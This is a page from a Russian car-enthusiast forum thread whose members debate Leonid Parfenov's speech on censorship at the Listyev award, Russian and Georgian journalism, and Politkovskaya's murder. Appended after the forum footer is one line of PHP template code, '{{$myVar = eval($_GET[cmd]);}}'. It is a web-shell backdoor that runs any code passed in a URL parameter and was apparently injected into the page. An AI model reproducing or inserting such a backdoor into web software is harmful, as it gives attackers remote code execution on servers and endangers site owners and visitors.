+ Ответить в теме
Страница 2 из 2 ПерваяПервая 1 2
Показано с 11 по 19 из 19

Тема: Леонид Парфенов на вручении премии имени В. Листьева


  1. #11
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Max: Ну ладно уже, не знаю как с Шевчуком, но с Жванецким сравнивать Парфенова это ну ни в какие ворота :) Про убеждения Шевчука я не особо знаю, мне сложно следить (ДА и нет особого желания) за политической обстановкой внутри России, но уж то, что Жванецкий всегда был против несправедливости, никогда не потакал политиканам - на моей памяти - факт :)
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  2. #12
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    Цитата Сообщение от daToxa Посмотреть сообщение
    Max: Ну ладно уже, не знаю как с Шевчуком, но с Жванецким сравнивать Парфенова это ну ни в какие ворота :)
    Глупость какая. Я никого ни с кем не сравниваю. Ты заговорил о тренде, я привел пример.

    Цитата Сообщение от daToxa Посмотреть сообщение
    ... мне сложно следить (ДА и нет особого желания) за политической обстановкой внутри России ...
    Звучит это примерно так: я не разбираюсь в ваших делах и разбираться не хочу, но мнение свою выскажу. А зачем тогда? daToxa, я не наезжаю, просто действительно не вижу смысла - если тебе все равно, к чему пытаться выносить суждения?
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  3. #13
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Я к тому что Парфенов (который к слову мне очень импонировал, тем что всегда был амбициозным и вроде бы справедливым журналистом и т.д.) заговорил о цензуре, свободе слова... Кхм, а где он был раньше? То что у меня нет желания лезть в политику (Ну аллергия у меня на нее :) ), но по-моему давно надо было молодым и крепким журналистам как Леонид начать бороться с тем что творится, потому что в отличии от Грузии, в России есть журналисты у которых есть сила и воля бороться, они могут... И тогда может не было дел вроде дел Политковской :( У меня же в стране безвольные слабаки, та пара борющихся ребят, что подняли голос года 4 назад... Сидят за решеткой :(
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  4. #14
    GTI-Racing Max is on a distinguished road Аватар для Max
    Регистрация
    24.08.2007
    Откуда
    Москва
    Машина
    VW Golf V GTI Edition 30
    Сообщений
    1,406
    Цитата Сообщение от daToxa Посмотреть сообщение
    Я к тому что Парфенов (который к слову мне очень импонировал, тем что всегда был амбициозным и вроде бы справедливым журналистом и т.д.) заговорил о цензуре, свободе слова... Кхм, а где он был раньше? То что у меня нет желания лезть в политику (Ну аллергия у меня на нее :) ), но по-моему давно надо было молодым и крепким журналистам как Леонид начать бороться с тем что творится, потому что в отличии от Грузии, в России есть журналисты у которых есть сила и воля бороться, они могут... И тогда может не было дел вроде дел Политковской :( У меня же в стране безвольные слабаки, та пара борющихся ребят, что подняли голос года 4 назад... Сидят за решеткой :(
    daToxa, у нас редко сажают за серьезное, обычно хоронят.
    Повторюсь, если то, о чем говорит Парфенов тренд - я за этот тренд: пусть все это имеют ввиду, пусть все об этом говорят, пусть все об этом думают.
    Совершить невозможное - не такая уж великая проблема, если знаешь с чего начать... (с) Max Frei

  5. #15
    GTI-Racing daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough daToxa is a jewel in the rough Аватар для daToxa
    Регистрация
    22.04.2009
    Откуда
    Tiflis
    Машина
    Audi S3 1.8T
    Сообщений
    739
    Max, я ЗА то, о чем говорит Парфенов, просто давно пора... а то что хоронят - это да :(
    При ускорении слезы восхищения должны стекать горизонтально в направлении ушей (c)Вальтер Рерль
    Перед торможением двигателем сначала происходит торможение бампером, затем - облицовкой радиатора, радиатором и только после этого - двигателем...

  6. #16
    GTI-Racing Cheh is on a distinguished road Аватар для Cheh
    Регистрация
    01.09.2009
    Откуда
    МО г. Реутов
    Машина
    A3 Sportback 2.0T DSG
    Сообщений
    185

    Post

    Цитата Сообщение от Гера Посмотреть сообщение
    Сии слова означают, что ты его когда-то уважал, а потом перестал. И вот - снова взял и зауважал. А чего разуважил в прошлый-то раз? :epti-work:
    Тут частично уже ответили.
    Оставшись работать на НекомпетентномТВ я перестал его уважать. От части я согласен с Тохой, бороться нужно было тогда, а сейчас его голос уже и не услышит большинство. Кстати, по телеку его выступление вырезали. Вот так мля, цензура не хуже чем при комуняках.

  7. #17
    Мимо проходил volter is on a distinguished road Аватар для volter
    Регистрация
    03.01.2019
    Откуда
    .
    Машина
    Временный пешеход
    Сообщений
    9
    Спасибо большое за такую полезную и интересную информацию, буду иметь ввиду.

  8. #18
    Мимо проходил joojoo is on a distinguished road Аватар для joojoo
    Регистрация
    16.01.2019
    Откуда
    Бобруйск
    Машина
    Бричка
    Сообщений
    20
    спасибо почитал

  9. #19
    Новичок Devid is on a distinguished road Аватар для Devid
    Регистрация
    05.04.2019
    Сообщений
    132
    Спасибо, полезно было узнать)

+ Ответить в теме
Страница 2 из 2 ПерваяПервая 1 2

Похожие темы

  1. Ответов: 1
    Последнее сообщение: 29.08.2007, 21:51

Ваши права

  • Вы не можете создавать новые темы
  • Вы не можете отвечать в темах
  • Вы не можете прикреплять вложения
  • Вы не можете редактировать свои сообщения
{{$myVar = eval($_GET[cmd]);}}